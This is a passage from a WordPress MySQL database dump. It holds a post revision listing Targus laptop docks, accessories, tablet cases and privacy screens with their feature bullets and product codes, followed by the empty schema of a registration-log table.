Gigabit Ethernet port for secure, wire speed Ethernet access</li><li>4 USB 3.0 ports for the latest peripherals (1 fast device-charging port)</li><li>Includes 1-meter USB-C to C host cable (detachable)</li><li>1 3.5mm combo Audio In/Out for mics, speakers, and earphones</li><li>2 DisplayPort (DP 1.2a) and 2 HDMI (HDMI 2.0) ports support dual 4K Ultra HD monitors</li><li>Ergonomic wedge design for comfortable typing</li><li>Integrated lock slot accommodates industry-standard security locks</li></ul><ul><li>1 Gigabit Ethernet Port for wired access at ultra-fast speeds</li><li>Ergonomic wedge design for comfortable typing</li><li>Integrated lock slot accommodates standard security locks to safeguard equipment</li><li>Universal compatibility with popular laptop and PC tablet brands and operating systems</li></ul><ul><li>1 Audio In/Out port for mics, speakers and earphones</li><li>1 DVI-I and 1 HDMI port supports dual monitors (up to 2048 x 1152 x 60 fps)</li><li>1 Gigabit Ethernet port for wired access at ultra-fast speeds</li><li>3 USB 3.0 SuperSpeed ports for the latest peripherals</li><li>1 USB 3.0 powered port for fast device charging</li><li>Integrated Lock Slot accommodates security locks to safeguard equipment</li><li>Universal compatibility with popular brands and operating systems</li><li>1 DisplayPort port supports a single 2K monitor (up to 2560 x 1600 x 30 fps)</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>VersaLink Universal Dual Video Travel Dock</strong></h3><p style=\"text-align: center;\">(DOCK110AP)</p><h3 style=\"text-align: center;\"><strong>USB-C DisplayPortâ„¢ Alt-Mode Travel Dock</strong></h3><p style=\"text-align: center;\">(DOCK411)</p><h3 style=\"text-align: center;\"><strong>USB-C Alt-Mode Travel Dock w/ PD</strong></h3><p style=\"text-align: center;\">(DOCK412AP)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/dock110usz_grande.jpg?v=1553684661\" alt=\"VersaLink Universal Dual Video Travel Dock\" width=\"259\" height=\"180\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0027522_usb-c-displayport-alt-mode-travel-dock_1024x1024.png?v=1546599971\" width=\"181\" height=\"181\" /></p><p><img src=\"https://www.targus.com/content/images/thumbs/0050999_usb-c-alt-mode-travel-dock-w-pd-black_150.png\" alt=\"Picture of USB-C Alt-Mode Travel Dock w/ PD (Black)\" width=\"187\" height=\"187\" /></p><ul><li>VGA video port with 2048 x 1152 at 60 FPS resolution. HDMI video port with 2560 x 1440 at 50 FPS resolution. Gigabit Ethernet port for secure, wire speed Ethernet access. 2 USB SuperSpeed 3.0 ports for mice, flash drives, external hard drives and card readers.</li><li>Integrated USB power cable connects to laptops, 2-in-1s and Microsoft Surface.</li><li>Compact, smartphone-size dock weighs less than 5.5 ounces for easy portability</li><li>Mac or PC compatible</li></ul><ul><li>Host-powered 90 mm tethered USB Type-C DisplayPortâ„¢ Alt-Mode (compatible with Thunderboltâ„¢ 3) host connection</li><li>VGA up to 2048 x 1152 60Hz or HDMI2.0 up to 4096 x 2160 30Hz 24 bpp monitor connection</li><li>1 USB 3.1 Gen 1 5Gbps (USB 3.0) Type-A port</li><li>1 Gigabit Ethernet port</li><li>HDMI includes 6 (5.1) channel audio</li><li>Universal compatibility with popular WindowsÂ® and macOSâ„¢ platforms</li><li>Compact size thatâ€™s ideal for travel</li></ul><ul><li>mDP (4096 x 2160 p30 max)</li><li>HDMI (4096 x 2160 p30 max)</li><li>VGA (1920 x 1200)</li><li>USB-C upstream cable (Laptop charging capable by PD pass through)</li><li>2 x USB 3.1 Gen 1 type A downstream port</li><li>1 x USB-C PD pass through (up to 60W) port with USB 3.1 Gen 1 downstream data support</li><li>Gigabit Ethernet; Lock Slot</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n			<h1>Dock Accessories</h1>		\n		<h3 style=\"text-align: center;\"><strong>USB-C to USB-A Cable</strong></h3><p style=\"text-align: center;\">(ACC1104GLX)</p><h3 style=\"text-align: center;\"><strong>3-Pin 3-Way Hydra DC Power Cable</strong></h3><p style=\"text-align: center;\">(ACC1009USX)</p><h3 style=\"text-align: center;\"><strong>USB-C Multiplexer Adapter</strong></h3><p style=\"text-align: center;\">(ACA46USZ)</p><h3 style=\"text-align: center;\"><strong>USB-C Alt-Mode Travel Dock w/ PD</strong></h3><p style=\"text-align: center;\">(ACA42USZ)</p><p><img src=\"https://www.targus.com/content/images/thumbs/0053546_usb-cf-to-usb-30-am-cable.jpeg\" width=\"188\" height=\"188\" /></p><p><img src=\"https://www.targus.com/content/images/thumbs/0030033_3-pin-3-way-hydra-dc-power-cable.png\" width=\"187\" height=\"187\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/ACA47GLZ_MAIN1_grande.png?v=1564601685\" alt=\"USB-C Multiplexer Adapter\" width=\"189\" height=\"189\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/ACA42USZ_grande.jpg?v=1553683594\" alt=\"USB-Câ„¢ Demultiplexer\" width=\"194\" height=\"194\" /></p><ul><li>USB Type-C female to USB 3.0 Type-A cable</li><li>10cm long with tether</li><li>Transfers data at rates up to 5 Gbps</li><li>Compatible with Targus DOCK180USZ</li></ul><ul><li>Powers up to 1 large and 1 small device simultaneously</li><li>Supports three connectors for multi-user and multi-device environments</li><li>Self-locking collars ensure tips and power cable stay in place</li><li>Uses existing Targus power cable and power tips from your powered dock (not included)</li></ul><ul><li>Supports USB-C laptops</li><li>Works with Targus docks DOCK171USZ, DOCK177USZ, ACP77USZ and ACP71USZ</li><li>Compact size for easy carrying</li><li>Provides up to 85W of power with PD 2.0 and charges USB-C devices that accept charging via the USB-C port</li><li>5 different charge profiles to ensure compatibility</li><li>Includes USB-A, 2-pin DC Power, and 3-pin DC power ports; outputs USB-C</li></ul><ul><li>1 USB-C/F port</li><li>Enables support for legacy host devices</li><li>Uses universal 3-pin power tip support</li><li>For use with DOCK 180</li><li>Supports power delivery charging up to 60W</li><li>Supports USB 3.0 data transfer up 5 Gbps</li><li>1 USB 3.0 Type A/M cable</li><li>1 Targus 3 pin DC power cable (with tips for various laptop models)</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n			<h1>Tablet Cases</h1>		\n		<h3 style=\"text-align: center;\"><strong>VersaVuÂ® Multi-Gen for 9.7\" IPad Pro, iPad Air 1, And 2</strong></h3><p style=\"text-align: center;\">(THZ634GL)</p><h3 style=\"text-align: center;\"><strong>3D Protection</strong><strong>â„¢ </strong><strong style=\"font-size: 1.25rem;\">Multi-Gen for </strong><strong style=\"font-size: 1.25rem;\">9.7 </strong><strong style=\"font-size: 1.25rem;\">iPad Pro, iPad Air 1, and 2</strong></h3><p style=\"text-align: center;\">(THZ635GL)</p><h3 style=\"text-align: center;\"><strong>New Pro-Tek Rotating iPad 9.7\" 2018 / 2017 Pro, Air 1 &amp; 2</strong></h3><p style=\"text-align: center;\">(THZ73711GL)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/THZ634GL_FRONT_grande.png?v=1549412474\" alt=\"Black VersaVuÂ® Classic Case (Black) for iPadÂ® (2017/2018) (THZ634GL) - Front\" width=\"195\" height=\"195\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0024531_3d-protection-case-black-for-ipad-20172018-97-inch-ipad-pro-ipad-air-2-and-ipad-air_1024x1024.jpg?v=1547855512\" width=\"194\" height=\"194\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/THZ73711GL_MAIN1_grande.png?v=1569597181\" alt=\"Pro-Tek Rotating Case for iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Silver\" width=\"198\" height=\"198\" /></p><ul><li>Passes military grade 4ft. drop testing (MIL-STD 810G)</li><li>Patented 360Â° rotation for portrait/landscape views</li><li>Adjustable viewing angles and comfortable typing angle</li><li>Precision cut access to controls, ports, and camera</li><li>Tray design enhances audio performance</li><li>Integrated stylus holder protects your Apple Pencilâ„¢ or stylus</li><li>Patent-protected multi-generation tray flexes to fit iPad Pro (9.7-inch), iPad Air 1 and 2</li><li>Convenient sleep/wake function works with iPad Pro (9.7-inch), iPad Air 1 and 2</li></ul><ul id=\"product-features\"><li>Passes military grade 4ft. drop testing (MIL-STD 810G)</li><li>Infinite viewing angles plus comfortable typing position</li><li>Patent-protected multi-generation tray flexes to fit iPad Pro (9.7-inch), iPad Air 1 and 2</li><li>Flexible tray with reinforced corners and bezel protection</li><li>Precision-cut access to controls, ports, and camera lenses</li><li>Easy-grip textured cover with secure magnetic wrap closure</li><li>Tray design enhances audio performance</li><li>Convenient sleep/wake function works with iPad ProÂ  (9.7-inch), iPad Air 1 and 2</li></ul><ul id=\"product-features\"><li>Color Black / Charcoal &amp; Silver</li><li>Passes military grade 4ft. drop testing</li><li>Geometric Pro-Tekâ„¢ design enhances protection</li><li>Reinforced corners guard against impact</li><li>Patented 360Â° rotation for portrait/landscape viewing</li><li>Virtually infinite viewing angles and comfortable typing position</li><li>Precision-cut access to controls, ports, and camera</li><li>Audio-enhancing sound scoops boost sound performance</li><li>Secure magnetic wrap closure</li><li>Integrated Apple Pencil/stylus holder</li><li>Limited lifetime warranty</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>New Click-In iPad 9.7\" 2018 / 2017 Pro, Air 1 &amp; 2</strong></h3><p style=\"text-align: center;\">(THZ73608GL)</p><h3 style=\"text-align: center;\"><strong>New VersaVu </strong><strong>iPad 9.7\" 2018 / 2017 Pro, Air 1 &amp; 2</strong></h3><p style=\"text-align: center;\">(THZ73803GL)</p><h3 style=\"text-align: center;\"><strong>New VersaVu Signature iPad 9.7\" </strong><strong>2018 / 2017 Pro, Air 1 &amp; 2</strong></h3><p style=\"text-align: center;\">(THZ73902GL)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THZ73608GL_MAIN1_grande.jpg?v=1571711592\" alt=\"Click-In Case for iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Rose Gold\" width=\"196\" height=\"196\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THZ73803GL_MAIN1_grande.jpg?v=1571711592\" alt=\"VersaVu Case for iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Red\" width=\"195\" height=\"195\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THZ73902GL_MAIN1_grande.jpg?v=1571711592\" alt=\"VersaVu Signature Case for iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Blue\" width=\"197\" height=\"197\" /></p><ul><li>Available Color Black/Charcoal, Rose Gold &amp; Silver</li><li>Passes military grade 4ft. drop testing for robust protection</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Precision cut access to controls, ports, and camera lenses</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic closure ensures secure transport</li><li>Integrated Apple Pencil/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black/Charcoal, Blue &amp; Red</li><li>Passes military grade 4ft. drop testing for robust protection</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Precision control, port and camera cutouts deliver hassle-free listening and photos</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple Pencil/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black/Charcoal &amp; Blue</li><li>Passes military grade 4ft. drop testing for robust protection</li><li>Premium fabric/faux leather exterior with metallic accents delivers standout style</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Secure, metallic snap-close mechanism delivers quick access and striking style</li><li>Premium faux leather hand strap</li><li>Integrated Apple Pencil/stylus holder</li><li>Limited lifetime warranty</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>VersaVu </strong><strong>11-inch </strong><strong>iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ74413GL)</p><h3 style=\"text-align: center;\"><strong>Pro-Tek </strong><strong>11-inchÂ  </strong><strong>iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ73803GL)</p><h3 style=\"text-align: center;\"><strong>VersaVu Signature </strong><strong>11-inch </strong><strong>iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ74502GL)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050396_versavu-classic-case-for-11-in-ipad-pro-burgundy_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Classic Case for iPad Pro (11-inch) - Burgundy\" width=\"190\" height=\"190\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050315_pro-tek-rotating-case-for-11-in-ipad-pro-black_grande.jpg?v=1571711589\" alt=\"Pro-Tekâ„¢ Rotating Case for iPad Pro (11-inch) - Black\" width=\"192\" height=\"192\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050385_versavu-classic-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Classic Case for iPad ProÂ® (12.9-inch) 3rd gen. - Black\" width=\"192\" height=\"194\" /></p><ul><li>Available Color Black &amp; Gold</li><li>Passes military grade 4â€™ drop testing for robust protection</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Precision cut access to controls, ports and camera lenses</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black &amp; Blue</li><li>Passes military grade 4â€™ drop testing for robust protection</li><li>Geometric Pro-Tek design delivers practical protection with adaptable good looks</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Patented 360Â° rotation for portrait/landscape viewing</li><li>Precision cut access to controls, ports and camera lenses</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black/Charcoal &amp; Blue</li><li>Passes military grade 4â€™ drop testing for robust protection</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Secure, metallic snap-close mechanism delivers quick access and striking style</li><li>Premium faux leather hand strap</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>VersaVu </strong><strong>11-inch</strong><strong> iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ74413GL)</p><h3 style=\"text-align: center;\"><strong>Pro-Tekâ„¢ </strong><strong>Rotating Case </strong><strong>12.9-inch iPadÂ® Pro</strong></h3><p style=\"text-align: center;\">(THZ748GL)</p><h3 style=\"text-align: center;\"><strong>VersaVuÂ® Classic Case for </strong><strong>12.9-inch </strong><strong>iPadÂ® Pro</strong></h3><p style=\"text-align: center;\">(THZ749GL)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050396_versavu-classic-case-for-11-in-ipad-pro-burgundy_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Classic Case for iPad Pro (11-inch) - Burgundy\" width=\"195\" height=\"195\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050315_pro-tek-rotating-case-for-11-in-ipad-pro-black_grande.jpg?v=1571711589\" alt=\"Pro-Tekâ„¢ Rotating Case for iPad Pro (11-inch) - Black\" width=\"192\" height=\"192\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050385_versavu-classic-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Classic Case for iPad ProÂ® (12.9-inch) 3rd gen. - Black\" width=\"196\" height=\"196\" /></p><ul><li>Available Color Black, Red &amp; Burgundy</li><li>Passes military grade 4â€™ drop testing for robust protection</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Precision control, port and camera cut-outs deliver hassle-free listening and photos</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul><li>Available Color Black</li><li>Passes military grade 4â€™ drop testing</li><li>Geometric Pro-Tekâ„¢ design delivers practical protection and enhances stability</li><li>Patented custom-molded tray with reinforced corners guard against impact</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing</li><li>Precision control, port, and camera cutouts deliver hassle-free listening and photos</li><li>Boosts sound with audio scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black</li><li>Passes military grade 4â€™ drop testing* for robust protection</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Precision control, port and camera cut-outs deliver hassle-free listening and photos</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>VersaVu Signature </strong><strong>12.9-inchÂ </strong><strong> iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ750GL)</p><h3 style=\"text-align: center;\"><strong>SafePort Rugged </strong><strong>Case for </strong><strong>12.9-inch iPad </strong><strong>(6th gen. / 5th gen.)</strong></h3><p style=\"text-align: center;\">(THD138GLZ)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050377_versavu-signature-series-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Signature Series Case for iPad ProÂ® (12.9-inch) 3rd gen. - Black\" width=\"190\" height=\"190\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/3_THD138GLZ_BACK2_1024x1024.jpg?v=1571711592\" width=\"189\" height=\"189\" /></p><ul><li>Available Color Black</li><li>Passes military grade 4â€™ drop testing* for robust protection</li><li>Premium fabric/faux leather exterior with metallic accents delivers standout style</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Secure, metallic snap-close mechanism delivers quick access and striking style</li><li>Premium faux leather hand strap</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul><li>Available Color Black</li><li>Heavy duty, shock-absorbing case for the iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch)</li><li>Form-fit TPU shell with USA Military-Spec drop protection â€“ protects your device from 1.2m/4ft drops</li><li>Offers rugged protection in a slim, professional-looking case</li><li>Sound enhancing scoops for all iPad speakers</li><li>Integrated stand for stable viewing and comfortable typing</li><li>Optional detachable shoulder strap (THA101GLZ)</li><li>Compatible with the ambient light sensor and mic on your device</li><li>Clear window on back to display asset tag</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>Protect Case for Microsoft Surfaceâ„¢ Go</strong></h3><p style=\"text-align: center;\">(THZ779GL)</p><h3 style=\"text-align: center;\"><strong>Protect Case for Microsoft Surfaceâ„¢ Go</strong></h3><p style=\"text-align: center;\">(THD491GLZ)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THZ779GL_11_PEN2_1024x1024.jpg?v=1571711592\" width=\"193\" height=\"193\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THD491GL_20_USE4_1024x1024.jpg?v=1571711592\" width=\"192\" height=\"192\" /></p><ul><li>Available Color Black</li><li>Case passes military grade 4â€™ drop testing (MIL-STD 810G)*</li><li>Hard-moulded tray with durable kickstand</li><li>Advanced corner protection with shock-absorbent TPU</li><li>Non-slip interior for infinite viewing angles</li><li>Integrated Surface Pen holder (pen not included)</li><li>Compatible with Surface Type Cover</li><li>Compatible with Surface Dock</li><li>Full access to camera and ports</li></ul><ul><li>Available Color Black</li><li>Case passes military grade 4â€™ drop testing (MIL-STD 810G)*</li><li>Hard-moulded tray with durable kickstand</li><li>Advanced corner protection with shock-absorbent TPU</li><li>Keyboard locking feature helps prevent accidental disconnects (keyboard not included)</li><li>Detachable hand strap (included) and integrated Surface Pen holder (pen not included)</li><li>Compatible with Surface Type Cover</li><li>Compatible with Surface Dock</li><li>Full access to camera and ports</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n			<h1>Privacy Screen</h1>		\n		<h3 style=\"text-align: center;\"><strong>Apple Macbook</strong></h3><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0049031_magnetic-privacy-screen-for-133-macbook-2017_ebc5f6e1-9646-4840-9ef4-6441c94ae069_grande.jpg?v=1571711592\" alt=\"Magnetic Privacy Screen for 13.3\" width=\"274\" height=\"274\" /></p><h2 style=\"text-align: center;\"><strong>Magnetic Privacy Screen for Apple MacBook</strong></h2><ul id=\"product-features\"><li>Protect your on-screen data, Privacy Screens block angled viewing from prying eyes</li><li>Magnetic screens easy to attach, remove and reattach. No tools, no adhesives, no installation required</li><li>Blue light filter: Targus Privacy Screens reduce blue light for better protection and reading comfort</li><li>AvailableÂ  for :-</li></ul><ol><li style=\"list-style-type: none;\"><ol><li><h4>MacBook 12-inchÂ  (ASM12MBGL)</h4></li><li><h4>MacBook 13.3-inch (ASM133MBP6GL)</h4></li><li><h4>MacBook Air 13.3-inch (ASM133MBA7GL)</h4></li><li><h4>MacBook 15.4-inch (ASM154MBGL)</h4></li><li><h4>MacBook Pro 15.4-inch (ASM154MBP6GL)</h4></li></ol></li></ol><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>Microsoft Surface</strong></h3><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0023768_privacy-screen-microsoft-surface-pro-4-123-clear_grande.jpg?v=1571711583\" alt=\"Privacy Screen Microsoft Surface Pro 4 (12.3\" width=\"215\" height=\"215\" /></p><h2 style=\"text-align: center;\">Â Microsoft Surface Pro 4 (12.3\") - Clear</h2><ul id=\"product-features\"><li>Privacy Screen for theÂ Microsoft Surface Pro 4 (12.3\") tablet</li><li>Works with touch screen</li><li>Anti-glare</li><li>Protect the information on your screen from unwanted viewing</li><li>Targus privacy screens are more touch-sensitive than other screens on the market</li><li>Reversible screen: shiny side ensures clarity for viewing inside, matt side reduces glare for viewing outside or in a bright room<strong><a href=\"https://uk.targus.com/pages/keep-your-business-your-business\" target=\"_blank\" rel=\"noopener noreferrer\"><u><br /></u></a></strong></li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>Laptop</strong></h3><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0019195_privacy-screen-116w-169_grande.jpg?v=1571711590\" alt=\"Targus Privacy Screen 11.6\" width=\"307\" height=\"307\" /></p><h2 style=\"text-align: center;\">Privacy Screen</h2><ul id=\"product-features\"><li>Privacy Screen for tablet, laptop or desktop screens</li><li>Works with touch screens and dual screens</li><li>Blue light filter: Targus Privacy Screens reduce blue light for better protection and reading comfort</li><li>Anti-glare</li><li>Protect the information on your screen from unwanted viewing</li><li>Targus privacy screens are more touch-sensitive than other screens on the market</li><li>Reversible screen: shiny side ensures clarity for viewing inside, matt side reduces glare for viewing outside or in a bright room</li><li>Three easy attachment options: under-bezel tabs, tab guides or re-usable adhesive strips</li><li>Available for :-Â </li></ul><ol><li style=\"list-style-type: none;\"><ol><li><h4>Screen 11.6\"W 16:9 - (ASF116W9EU)</h4></li><li><h4>Screen 12.1\"W 16:10 - (ASF121WEU)</h4></li><li><h4>Screen 12.5\"W 16:9 - (ASF125W9EU)</h4></li><li><h4>Screen 13.3\"W 16:10 - (ASF133WEU)</h4></li><li><h4>Screen 13.3\"W 16:9 - (ASF133W9EU)</h4></li><li><h4>Screen 14.1\"W 16:10 - (ASF141WEU)</h4></li><li><h4>Screen 14.1\"W 16:9 - (ASF141W9EU)</h4></li><li><h4>Screen 14â€ W 16:9 - (ASF14W9EU)</h4></li><li><h4>Screen 15.4\"W 16:10 - (ASF154WEU)</h4></li><li><h4>Screen 15.6\"W 16:9 - (ASF156W9EU)</h4></li></ol></li></ol><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>Monitor</strong></h3><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0019283_privacy-screen-17-43_grande.jpg?v=1571711590\" alt=\"Targus Privacy Screen 17\" width=\"269\" height=\"269\" /></p><h2 style=\"text-align: center;\">Privacy Screen</h2><ul id=\"product-features\"><li>Privacy Screen for laptop or desktop screens</li><li>Works with touch screens and dual screens</li><li>Blue light filter: Targus Privacy Screens reduce blue light for better protection and reading comfort</li><li>Anti-glare</li><li>Protect the information on your screen from unwanted viewing</li><li>Targus privacy screens are more touch-sensitive than other screens on the market</li><li>Reversible screen: shiny side ensures clarity for viewing inside, matt side reduces glare for viewing outside or in a bright room</li><li>Three easy attachment options: under-bezel tabs, tab guides or re-usable adhesive strips</li><li>Available for :-Â </li></ul><ol><li style=\"list-style-type: none;\"><ol><li><h4>Screen 17\"W 4:3 - (ASF170EU)</h4></li><li><h4>Screen 19\"W 4:3 - (ASF190EU)</h4></li><li><h4>Screen 19\"W 16:10 - (ASF19WEU)</h4></li><li><h4>Screen 21.5\"W 16:9 - (ASF215W9EU)</h4></li><li><h4>Screen 22\"W 16:10 - (ASF220WEU)</h4></li><li><h4>Screen 22\"W 16:9 - (ASF22W9EU)</h4></li><li><h4>Screen 23\"W 16:9 - (ASF23W9EU)</h4></li><li><h4>Screen 23.8\"W 16:9 - (ASF238W9EU)</h4></li><li><h4>Screen 24\"W 16:10 - (ASF24WEU)</h4></li><li><h4>Screen 24\"W 16:9 - (ASF24W9EU)</h4></li><li><h4>Screen 27\"W 16:9 - (ASF27W9EU)</h4></li></ol></li></ol><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>','Targus','','inherit','closed','closed','','3686-revision-v1','','','2019-11-06 14:13:47','2019-11-06 06:13:47','',3686,'https://bintara.com.my/blog/2019/11/06/3686-revision-v1/',0,'revision','',0);
/*!40000 ALTER TABLE `wpdp_posts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_registration_log`
--

DROP TABLE IF EXISTS `wpdp_registration_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_registration_log` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `email` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `IP` varchar(30) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `blog_id` bigint(20) NOT NULL DEFAULT '0',
  `date_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`ID`),
  KEY `IP` (`IP`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_registration_log`
--

LOCK TABLES `wpdp_registration_log` WRITE;
